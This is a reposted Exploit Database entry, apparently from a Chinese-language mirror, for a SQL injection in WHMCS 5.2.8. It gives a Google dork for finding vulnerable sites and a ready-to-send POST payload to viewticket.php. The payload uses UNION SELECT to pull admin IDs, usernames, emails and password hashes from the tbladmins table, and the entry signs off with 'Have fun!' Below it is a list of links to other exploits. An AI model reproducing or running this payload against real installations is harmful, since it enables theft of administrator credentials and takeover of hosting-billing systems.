WHMCompleteSolution (WHMCS) 5.2.8 – SQL Injection

Exploit Database
72 阅读

作者： g00n

日期： 2013-10-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/29065/

# Exploit Title: WHMCS 5.2.8 SQL Injection
# Google Dork: "powered by WHMCS"
# Date: 10/18/2013
# Exploit Author: g00n ( Xploiter.net )
# Vendor Homepage: http://www.whmcs.com/
# Software Link: http://www.whmcs.com/
# Version: 5.2.8
# Tested on: Windows, Linux

Vulnerable file: /includes/dbfunctions.php

POC:

select_query() function is vulnerable due to Register Globals

Example:

/whmcs/viewticket.php

POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#


Have fun!

last Exploits
WHMCompleteSolution (WHMCS) 5.2.8 – SQL Injection的更多信息

Online Book Store 1.0 – ‘id’ SQL Injection：
JForum 2.1.8 BookMarks – Cross-Site Request Forgery / Cross-Site Scripting：
cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal：
OpenDocMan 1.2.7 – Multiple Vulnerabilities：
Backdrop CMS 1.23.0 – Stored XSS：
Gogs – ‘users’/’repos’ ‘?q’ SQL Injection：
iSupport 1.8 – SQL Injection：
Siena CMS 1.242 – ‘err’ Cross-Site Scripting：